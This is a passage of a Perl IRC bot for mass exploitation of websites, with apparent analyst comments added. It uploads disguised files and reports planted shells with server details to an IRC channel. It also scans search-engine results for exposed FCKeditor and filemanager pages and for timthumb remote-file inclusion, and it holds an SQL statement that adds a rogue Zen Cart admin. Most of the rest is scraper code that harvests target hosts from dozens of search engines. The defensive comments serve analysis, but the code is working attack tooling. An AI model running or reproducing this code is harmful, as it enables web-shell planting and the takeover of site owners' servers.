- my $resc = $browser->post( $url,['file_1' => ['./allnet.jpg' => 'allnet.html' => 'application/octet-stream']],'Content-Type' => 'form-data');
- my $hasil = $res->as_string;
- my $hasil1 = $resa->as_string;
- my $hasil2 = $resb->as_string;
- my $hasil3 = $resc->as_string;
- my $check = &get_content("http://".$site."images/aspaltx.php");&get_content("http://".$site."images/byroe.php");&get_content("http://".$site."images/allnet.html");sleep(3);
- if ($check =~ /JANCOK- exploits/) {
- my $safe ="";
- my $os ="";
- my $free ="";
- if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
- if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
- if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
- if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
- &msg("$chan","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4aspaltx.php 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- &msg("$admin","$oscologo(4@8$engine15)15(4@9SHeLL15)13 http://".$site."images/4allnet.html 9(4@15SafeMode= $safe9)(4@15OS= $os9)(4@15FreeSpace= $free9)");sleep(2);
- }
- }
# loko($chan, $bug, $dork, $engine): detection-only scan for an exposed file
# manager page.
# For each host from search_engine() it fetches
# http://<host>filemanager/browser.html and reports the URL to $chan when
# the body matches $loko_output (a pattern defined outside this part of the
# file). Nothing is uploaded here and $bug is only passed to search_engine().
# Analyst note: a filemanager/browser.html that answers anonymous requests
# should be removed or put behind authentication.
- sub loko() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$lokologo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site."filemanager/browser.html";
- my $vuln = "http://".$site."filemanager/browser.html";
- my $re = &get_content($test);
- if ($re =~ /$loko_output/){
- &msg("$chan", "$lokologo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
- }
- }
- }
- }
# op($chan, $bug, $dork, $engine): detection-only scan for an exposed
# FCKeditor connector test page.
# For each host from search_engine() it fetches http://<host>$open_test and
# reports the fixed path
# admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
# to $chan when the body matches $open_output. Both $open_test and
# $open_output are defined outside this part of the file.
# Analyst note: the connectors/test.html page ships with the editor as a
# sample and has no place on a production site; deleting the sample pages
# removes what this scan looks for.
- sub op() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$oplogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site.$open_test;
- my $vuln = "http://".$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
- my $re = &get_content($test);
- if ($re =~ /$open_output/){
- &msg("$chan", "$oplogo(4@8$engine15)(4@13VulN15)13 ".$vuln."15(4@0UPLOAD15)");
- }
- }
- }
- }
# zen($chan, $bug, $dork, $engine): check hosts for an already-present shell
# page (the ZEN label presumably refers to Zen Cart; the code does not say).
# For each host from search_engine() it fetches the URL in $vuln (a
# brons.php under images/) and reports it to $chan when the body contains
# "JANCOK- exploit", matched case-insensitively.
# $test (an admin password_forgotten.php URL) and $que (an SQL INSERT adding
# an admin row) are only assigned in this function; nothing visible here
# sends them.
# Analyst note: the account name 'adminsys' and the address
# admin@mazacrew.co.cc in $que are worth searching for in a shop's admin
# table during incident response.
- sub zen() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$zenlogo(4@8$engine15)10 Scan finish"); }
- my $test = "http://".$site."admin/record_company.php/password_forgotten.php?action=insert";
- my $vuln = "http://".$site."images/4brons.php";
- my $que = "INSERT INTO admin (admin_id, admin_name, admin_email, admin_pass) VALUES (56,'adminsys','admin@mazacrew.co.cc','617ec22fbb8f201c366e9848c0eb6925:87');";
- my $re = &get_content($vuln);
- if ($re =~ /JANCOK- exploit/i){
- &msg("$chan", "$zenlogo(4@8$engine15)(4@13Shell15)13 ".$vuln."");
- }
- else{
- # &msg("$chan", "$zenlogo(4@8$engine15)(4@13GaGaL15)4 ".$vuln."15(4@9Ab0rteD15)");
- }
- }
- }
- }
- ######################################### ADDED
# thumb($chan, $bug, $dork, $engine): timthumb.php scan driver.
# For each host from search_engine() it requests
# <host><bug>timthumb.php?src=$thumbshell, then requests one fixed file name
# under cache/ and under temp/. The host is reported to $chan when the
# first response contains "tripl3k was Here" (case-insensitive); the cache/
# and temp/ responses ($loco1, $loco2) are fetched and not examined.
# Analyst note: a file named c54af1d13e884a4c63da8f3098a7a4da.php in a
# timthumb cache/ or temp/ directory, and timthumb.php requests whose src=
# points at an external host, are the indicators. Limiting the script's
# allowed source hosts and denying PHP execution in its cache directory are
# the relevant controls.
- sub thumb() {
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $count = 0;
- my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
- my $num = scalar(@list);
- if ($num > 0) {
- foreach my $site (@list) {
- $count++;
- if ($count == $num-1) { &msg("$chan","$thumblogo(4@9$engine15)10 Scan finish"); }
- my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";
- my $cek = &get_content($coba);sleep(1);
- my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";
- my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";
- my $ceck1 = "http://".$site.$bug.".$aa";
- my $ceck2 = "http://".$site.$bug.".$ab";
- my $loco1 = &get_content($ceck1);sleep(1);
- my $loco2 = &get_content($ceck2);sleep(1);
- if ($cek =~ /tripl3k was Here/i) {
- my $vuln = "http://".$site.$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";
- &msg("$chan", "$thumblogo(4@8$engine15)(4@4VulN15)4 ".$vuln." 15(4@9 0WN3D 15)");
- }
- }
- }
- }
- #########################################
# search_engine($chan, $bug, $dork, $engine, $logo): run the dork $dork
# through the one scraper whose label equals $engine and return the
# resulting host list.
#   $chan - IRC channel that receives the Total/Clean counts via msg()
#   $bug  - accepted but not used in this function
#   $logo - prefix string for the status line
# The comparison is an exact, case-sensitive string match on the mixed-case
# labels below; an unknown label leaves @total empty. Results pass through
# clean() (defined outside this part of the file; presumably de-duplication)
# before they are returned.
# Analyst note: every candidate host comes from public search results, so
# the dork strings this bot is fed describe which URL patterns expose a
# site to this class of scanner.
- sub search_engine() {
- my (@total,@clean);
- my $chan = $_[0];
- my $bug = $_[1];
- my $dork = $_[2];
- my $engine = $_[3];
- my $logo = $_[4];
- if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google); }
- if ($engine eq "ReDiff") { my @rediff = &rediff($dork); push(@total,@rediff); }
- if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); }
- if ($engine eq "ALtaViSTa") { my @altavista = &altavista($dork); push(@total,@altavista); }
- if ($engine eq "YahOo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); }
- if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); }
- if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); }
- if ($engine eq "CluSty") { my @clusty = &clusty($dork); push(@total,@clusty); }
- if ($engine eq "GutSer") { my @gutser = &gutser($dork); push(@total,@gutser); }
- if ($engine eq "GooGle2") { my @google2 = &google2($dork); push(@total,@google2); }
- if ($engine eq "ExaLead") { my @exalead = &exalead($dork); push(@total,@exalead); }
- if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); }
- if ($engine eq "VirgiLio") { my @virgilio = &virgilio($dork); push(@total,@virgilio); }
- if ($engine eq "WebDe") { my @webde = &webde($dork); push(@total,@webde); }
- if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot); }
- if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); }
- if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); }
- if ($engine eq "DuCk") { my @duck = &duck($dork); push(@total,@duck); }
- if ($engine eq "LyGo") { my @lygo = &lygo($dork); push(@total,@lygo); }
- if ($engine eq "YauSe") { my @yause = &yause($dork); push(@total,@yause); }
- if ($engine eq "BaiDu") { my @baidu = &baidu($dork); push(@total,@baidu); }
- if ($engine eq "KiPoT") { my @kipot = &kipot($dork); push(@total,@kipot); }
- if ($engine eq "GiBLa") { my @gibla = &gibla($dork); push(@total,@gibla); }
- if ($engine eq "BLacK") { my @black = &black($dork); push(@total,@black); }
- if ($engine eq "oNeT") { my @onet = &onet($dork); push(@total,@onet); }
- if ($engine eq "SiZuka") { my @sizuka = &sizuka($dork); push(@total,@sizuka); }
- if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); }
- if ($engine eq "DeMos") { my @demos = &demos($dork); push(@total,@demos); }
- if ($engine eq "RoSe") { my @rose = &rose($dork); push(@total,@rose); }
- if ($engine eq "SeZnaM") { my @seznam = &seznam($dork); push(@total,@seznam); }
- if ($engine eq "TisCali") { my @tiscali = &tiscali($dork); push(@total,@tiscali); }
- if ($engine eq "NaVeR") { my @naver = &naver($dork); push(@total,@naver); }
- @clean = &clean(@total);
- &msg("$chan","$logo(4@8$engine15)4 Total:0 (".scalar(@total).")4 Clean:0 (".scalar(@clean).")");
- return @clean;
- }
- #########################################
# isFound($link, $reqexp): fetch $link with get_content() and return 1 when
# the body matches $reqexp, else 0.
# $reqexp is interpolated into the match as a regular expression, not as a
# literal string.
- sub isFound() {
- my $status = 0;
- my $link = $_[0];
- my $reqexp = $_[1];
- my $res = &get_content($link);
- if ($res =~ /$reqexp/) { $status = 1 }
- return $status;
- }
# get_content($url): GET $url with a 7-second timeout and return the
# response body, whatever the HTTP status was.
# The User-Agent comes from $uagent, which is set outside this part of the
# file (presumably picked from the browser strings in @uagents), so the
# probes made through this helper do not carry a fixed agent string.
# Analyst note: detection of this scanner should key on the requested paths
# and payload markers, not on the User-Agent of these requests.
- sub get_content() {
- my $url = $_[0];
- my $ua = LWP::UserAgent->new(agent => $uagent);
- $ua->timeout(7);
- my $req = HTTP::Request->new(GET => $url);
- my $res = $ua->request($req);
- return $res->content;
- }
- ######################################### SEARCH ENGINE gibla
# google($key): collect candidate hosts for the dork $key from Google.
# Requests result offsets 0 to 400 in steps of 10, takes every http:// link
# target from the HTML, skips those containing "google" and passes the rest
# through links(). key(), links() and search_engine_query() are defined
# outside this part of the file. Returns the accumulated list.
- sub google() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=400; $i+=10){
- my $search = ("http://www.google.com/search?q=".&key($key)."&num=100&filter=0&start=".$i);
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- if ($1 !~ /google/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# rediff($key): collect candidate hosts for the dork $key from
# search1.rediff.com.
# Steps firstres from 0 in tens; when the page holds no link back to the
# current offset, $i is set to 500 so the loop ends after this page.
# Links containing "rediff.com" are skipped, the rest go through links().
# $b is assigned without my, so it is the package global $b.
- sub rediff() {
- my @list;
- my $key = $_[0];
- for (my $i=0; $i<=500; $i+=10) {
- my $search = ("http://search1.rediff.com/dirsrch/default.asp?MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
- $b = "$i";
- my $res = &search_engine_query($search);
- if ($res !~ /firstres=$b\'>/) {$i=500;}
- while ($res =~ m/<a href=\"http:\/\/(.*?)\" onmousedown/g) {
- if ($1 !~ /rediff\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# uol($key): collect candidate hosts for the dork $key from
# mundo.busca.uol.com.br.
# Steps the start offset from 1 in tens and ends after the first page that
# lacks the "next" marker span. Links containing "uol.com" are skipped, the
# rest go through links(). Returns the accumulated list.
- sub uol() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=10) {
- my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".&key($key)."&start=".$i);
- my $res = &search_engine_query($search);
- if ($res !~ m/<span class=\"next\">próxima<\/span>/){$i=500;}
- while ($res =~ m/<a href=\"http:\/\/([^>\"]*)/g) {
- if ($1 !~ /uol\.com/) {
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# bing($key): collect candidate hosts for the dork $key from Bing.
# Steps the first= offset from 1 in tens and ends after a page that contains
# "Ref A:", "Ref B:" and "Ref C:" together (presumably the engine's error or
# block page). Links containing "bing.com" are skipped, the rest go through
# links(). Returns the accumulated list.
- sub bing() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=10) {
- my $search = ("http://www.bing.com/search?q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
- my $res = &search_engine_query($search);
- if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- if ($1 !~ /bing\.com/) {
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# altavista($key): collect candidate hosts for the dork $key from
# it.altavista.com.
# Steps stq from 1 in tens and ends after the first page without the "Succ"
# next link. Hosts are read from the <span class=ngrn> result line, with
# "<" and spaces removed; entries containing "altavista" are skipped and
# the rest go through links().
- sub altavista() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=500; $i+=10){
- my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
- my $res = &search_engine_query($search);
- if ($res !~ /target=\"_self\">Succ/) {$i=500;}
- while ($res =~ m/<span class=ngrn>(.+?)\//g) {
- if ($1 !~ /altavista/){
- my $link = $1;
- $link =~ s/<//g;
- $link =~ s/ //g;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# ask($key): collect candidate hosts for the dork $key from it.ask.com.
# Walks result pages 1 to 50 and ends after the first page without the
# "Successiva" (next) link. Links containing "ask.com" are skipped, the rest
# go through links(). Returns the accumulated list.
- sub ask() {
- my @list;
- my $key = $_[0];
- for (my $i=1; $i<=50; $i+=1) {
- my $search = ("http://it.ask.com/web?q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".$i."&jss=1&dm=all");
- my $res = &search_engine_query($search);
- if ($res !~ /Successiva/) {$i=50;}
- while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=\"/g) {
- if ($1 !~ /ask\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# yahoo($key): collect candidate hosts for the dork $key from
# search.yahoo.com.
# Steps the b= offset from 1 to 500 in tens with no early exit. Targets are
# read from the percent-encoded "http%3a//" form used in the result links;
# those containing "yahoo.com" are skipped and the rest go through links().
- sub yahoo(){
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=500; $b+=10) {
- my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/http\%3a\/\/(.+?)\"/g) {
- if ($1 !~ /yahoo\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# clusty($key): collect candidate hosts for the dork $key from
# search.yippy.com.
# Steps the offset inside the v:state parameter from 10 in tens and ends
# after the first page that does not contain "next". Result links are read
# from the document-header div; those containing "yippy.com" are skipped
# and the rest go through links().
- sub clusty() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=10; $b<=500; $b+=10) {
- my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
- my $res = &search_engine_query($search);
- if ($res !~ /next/) {$b=500;}
- while ($res =~ m/<div class=\"document-header\"><a href=\"http:\/\/(.*?)\"><span class=\"title\">/g) {
- if ($1 !~ /yippy\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# gutser($key): collect candidate hosts for the dork $key from
# www.goodsearch.com.
# Walks pages 1 to 50 with no early exit. Links containing goodsearch,
# good.is, w3.org or quantserve are skipped, the rest go through links().
# $b is used without my, so the loop counter is the package global $b.
- sub gutser() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://www.goodsearch.com/Search.aspx?Keywords=".&key($key)."&page=".$b."&osmax=0");
- my $res = &search_engine_query($search);
- while ($res =~ m/http:\/\/([^>\"]*)\">/g) {
- if ($1 !~ /goodsearch|good\.is|w3\.org|quantserve/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# google2($key): collect candidate hosts for the dork $key from a
# country-specific Google domain.
# @doms lists the country suffixes; $dom is drawn from it at random (the
# foreach variable $domain is not used). The return sits inside the
# foreach, after the offset loop, so one randomly chosen domain is queried
# per call, at offsets 1 to 191 in tens. Links containing "google" are
# skipped and the rest go through links(). $dom is a package global (no my).
# Analyst note: spreading queries over country domains looks like a way to
# dilute per-domain rate limiting on the search side; it changes nothing
# for the sites that end up in the result list.
- sub google2() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- my @doms = ("ae","com.af","com.ag","off.ai","am","com.ar","as","at","com.au","az","ba","com.bd","be","bg","bi","com.bo","com.br","bs","co.bw","com.bz","ca","cd","cg","ch","ci","co.ck","cl","com.co","co.cr","com.cu","de","dj","dk","dm","com.do","com.ec","es","com.et","fi","com.fj","fm","fr","gg","com.gi","gl","gm","gr","com.gt","com.hk","hn","hr","co.hu","co.id","ie","co.il","co.im","co.in","is","it","co.je","com.jm","jo","co.jp","co.ke","kg","co.kr","kz","li","lk","co.ls","lt","lu","lv","com.ly","mn","ms","com.mt","mu","mw","com.mx","com.my","com.na","com.nf","com.ni","nl","no","com.np","nr","nu","co.nz","com.om","com.pa","com.pe","com.ph","com.pk","pl","pn","com.pr","pt","com.py","ro","ru","rw","com.sa","com.sb","sc","se","com.sg","sh","sk","sn","sm","com.sv","co.th","com.tj","tm","to","tp","com.tr","tt","com.tw","com.ua","co.ug","co.uk","com.uy","uz","com.vc","co.ve","vg","co.vi","com.vn","vu","ws","co.za","co.zm");
- foreach my $domain (@doms) { $dom = $doms[rand(scalar(@doms))];
- for ($b=1; $b<=200; $b+=10) {
- my $search = ("http://www.google.".$dom."/search?num=50&q=".&key($key)."&start=".$b."&sa=N");
- my $res = &search_engine_query($search);
- while ($res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g) {
- if ($1 !~ /google/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- } return @list;
- }
- }
# exalead($key): collect candidate hosts for the dork $key from
# www.exalead.com.
# Steps start_index from 0 in hundreds; a page containing the
# <span id="topNextUrl"> element sets $b to 1000 so the loop ends after it.
# Targets are read from the thumbnail links; those containing "exalead" are
# skipped and the rest go through links(). $b is the package global (no my).
- sub exalead() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=1000; $b+=100) {
- my $search = ("http://www.exalead.com/search/web/results/?q=".&key($key)."&elements_per_page=100&start_index=".$b);
- my $res = &search_engine_query($search);
- if ($res =~ m/<span id=\"topNextUrl\">/g) {$b=1000;}
- while ($res =~ m/<a class=\"thumbnail\" href=\"http:\/\/(.*?)\"/g) {
- my $link = $1;
- if ($link!~ /exalead/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# lycos($key): collect candidate hosts for the dork $key from
# search.lycos.com.
# Walks page2 values 0 to 50 with no early exit. Links containing
# "lycos.com" are skipped, the rest go through links().
# $b is the package global (no my).
- sub lycos() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://search.lycos.com/?query=".&key($key)."&page2=".$b."&tab=web&searchArea=web&diktfc=468007302EF7DB9AFE53D4138B848E7B4000D424385F");
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.+?)\" onmouseover=/g) {
- if ($1 !~ /lycos\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# virgilio($key): collect candidate hosts for the dork $key from
# ricerca.virgilio.it.
# Steps the offset from 10 in tens and ends after a page carrying either of
# two Italian messages: "non ha prodotto risultati" (no results) or
# "riconducibile a richieste effettuate" (presumably the engine's
# automated-query notice). Links containing ".virgilio.it" are skipped, the
# rest go through links(). $b is the package global (no my).
- sub virgilio() {
- my @list;
- my $key = $_[0];
- for ($b=10; $b<=500; $b+=10) {
- my $search = ("http://ricerca.virgilio.it/ricerca?qs=".&key($key)."&filter=1&site=&lr=&hits=10&offset=".$b);
- my $res = &search_engine_query($search);
- if ($res =~ m/non ha prodotto risultati/i) {$b=500;}
- if ($res =~ m/riconducibile a richieste effettuate/i) {$b=500;}
- while ($res =~ m/<a href=\"http:\/\/(.+?)\" target=\"/g) {
- if ($1 !~ /\.virgilio\.it/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# webde($key): collect candidate hosts for the dork $key from suche.web.de.
# Walks pageIndex 1 to 50 and ends after a page containing
# "Suchbegriff nicht gefunden" (search term not found). Hosts are read from
# the <span class="url"> element; any entry containing "suche" or "web" is
# skipped and the rest go through links(). $b is the package global (no my).
- sub webde() {
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://suche.web.de/search/web/?pageIndex=".$b."&su=".&key($key)."&search=Suche&webRb=countryDE");
- my $res = &search_engine_query($search);
- if ($res =~ m/Suchbegriff nicht gefunden/i) {$b=50;}
- while ($res =~ m/<span class=\"url\">http:\/\/(.*?)<\/span>/g) {
- my $link = $1;
- if ($link!~ /suche|web/){
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# hotbot($key): collect candidate hosts for the dork $key from
# www.hotbot.com with currProv=msn.
# Walks page values 0 to 50 and ends after a page containing
# "had no web result". Targets are read from rel="nofollow" links; those
# containing "hotbot.com" are skipped and the rest go through links().
# $b is the package global (no my).
- sub hotbot() {
- my @list;
- my $key = $_[0];
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=msn&page=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
- my $res = &search_engine_query($search);
- if ($res =~ m/had no web result/i) {$b=50;}
- while ($res =~ m/rel=\"nofollow\" href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /hotbot\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# aol($key): collect candidate hosts for the dork $key from
# aim.search.aol.com.
# Walks pages 2 to 50 with no early exit. Links containing "aol.com" are
# skipped, the rest go through links(). $b is the package global (no my).
- sub aol() {
- my @list;
- my $key = $_[0];
- for ($b=2; $b<=50; $b+=1) {
- my $search = ("http://aim.search.aol.com/aol/search?q=".&key($key)."&page=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\" property/g) {
- if ($1 !~ /aol\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# sapo($key): collect candidate hosts for the dork $key from
# pesquisa.sapo.pt.
# Walks pages 1 to 50 and ends after the first page without "Next"
# (case-insensitive). Links containing ".sapo.pt" are skipped, the rest go
# through links(). $b is the package global (no my).
- sub sapo(){
- my @list;
- my $key = $_[0];
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://pesquisa.sapo.pt/?barra=resumo&cluster=0&format=html&limit=10&location=pt&page=".$b."&q=".&key($key)."&st=local");
- my $res = &search_engine_query($search);
- if ($res !~ m/Next/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.*?)\"/g) {
- if ($1 !~ /\.sapo\.pt/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# duck($key): collect candidate hosts for the dork $key from the
# duckduckgo.com HTML endpoint.
# Sends the counter 1 to 50 as both s= and dc=, and ends after a page
# containing "No more results". Links containing "duckduckgo" are skipped,
# the rest go through links(). Returns the accumulated list.
- sub duck() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://duckduckgo.com/html/?q=".&key($key)."&t=A&l=en&p=1&s=".$b."&o=json&dc=".$b."&api=d.js");
- my $res = &search_engine_query($search);
- if ($res =~ m/No more results/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"/g) {
- if ($1 !~ /duckduckgo/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# lygo($key): collect candidate hosts for the dork $key from
# www.hotbot.com with currProv=lygo.
# Walks page2 values 0 to 50 and ends after a page containing
# "had no web result". Targets are read from links followed directly by an
# <img> tag; those containing "hotbot.com" are skipped and the rest go
# through links().
- sub lygo() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://www.hotbot.com/?query=".&key($key)."&ps=&loc=searchbox&tab=web&mode=search&currProv=lygo&page2=".$b."&diktfc=51964BFDE35DFB6914F9E1E0D7988C3AC0ACB52B58BE");
- my $res = &search_engine_query($search);
- if ($res =~ m/had no web result/i) {$b=50;}
- while ($res =~ m/<a href=\"http:\/\/(.+?)\"><img/g) {
- if ($1 !~ /hotbot\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# yause($key): collect candidate hosts for the dork $key from
# www.yauba.com.
# Walks pg values 1 to 50 and ends after the first page without "Next"
# (case-insensitive). Targets are read from the <h1> result links; those
# containing "yauba.com" are skipped and the rest go through links().
- sub yause() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://www.yauba.com/?query=".&key($key)."&where=websites&target=websites&con=y&ilang=english&clt=topic&pg=".$b);
- my $res = &search_engine_query($search);
- if ($res !~ m/Next/i) {$b=50;}
- while ($res =~ m/<h1><a rel=\"nofollow\" href=\"http:\/\/(.+?)\" onfocus=/g) {
- if ($1 !~ /yauba\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# baidu($key): collect candidate hosts for the dork $key from www.baidu.com.
# Steps the pn offset from 0 to 500 in tens with no early exit. Links
# containing "baidu.com" are skipped, the rest go through links().
# Returns the accumulated list.
- sub baidu() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=500; $b+=10) {
- my $search = ("http://www.baidu.com/s?wd=".&key($key)."&pn=".$b);
- my $res = &search_engine_query($search);
- while ($res =~ m/\" href=\"http:\/\/(.*?)\" target=/g) {
- if ($1 !~ /baidu\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# kipot($key): collect candidate hosts for the dork $key from
# www.qkport.com.
# The page number (1 to 50) is a path segment in front of the query; there
# is no early exit. Links containing "qkport.com" are skipped, the rest go
# through links(). Returns the accumulated list.
- sub kipot() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=1; $b<=50; $b+=1) {
- my $search = ("http://www.qkport.com/".$b."/web/".&key($key));
- my $res = &search_engine_query($search);
- while ($res =~ m/href=\"http:\/\/(.*?)\" target=\"_top\"/g) {
- if ($1 !~ /qkport\.com/){
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- }
- }
- return @list;
- }
# gibla($key): collect candidate hosts for the dork $key from
# www.gigablast.com.
# Fetches the first result page, then loops for as long as the current page
# contains "Next 10 Results": it collects the <span class="url"> entries,
# reads the next-page path from the first <center> link into $hal and
# fetches again. Nothing is filtered out before links() is called.
- sub gibla() { # marked "mati" (Indonesian: dead) by the author
- my @list;
- my $key = $_[0];
- my $hal = "/search?q=".&key($key);
- my $search = ("http://www.gigablast.com".$hal);
- my $res = &search_engine_query($search);
- while ($res =~ m/Next 10 Results/) {
- $search = ("http://www.gigablast.com".$hal);
- while ($res =~ m/<span class=\"url\">(.+?)><\/span>/g) {
- my $link = $1;
- my @grep = &links($link);
- push(@list,@grep);
- }
- if ($res =~ m/<center><a href=\"(.*?)\">/) { $hal = $1; }
- $res = &search_engine_query($search);
- }return @list;
- }
# black($key): collect candidate hosts for the dork $key from blekko.com.
# Walks p values 0 to 50 and ends after the first page that does not show
# the current counter inside <strong> tags. $cek is computed and not used.
# Targets are read from the UrlTitleLine links; those containing "blekko"
# are skipped and the rest go through links().
- sub black() {
- my @list;
- my $key = $_[0];
- my $b = 0;
- for ($b=0; $b<=50; $b+=1) {
- my $search = ("http://blekko.com/ws/".&key($key)."?ft=&p=".$b);
- my $cek = $b+1;
- my $res = &search_engine_query($search);
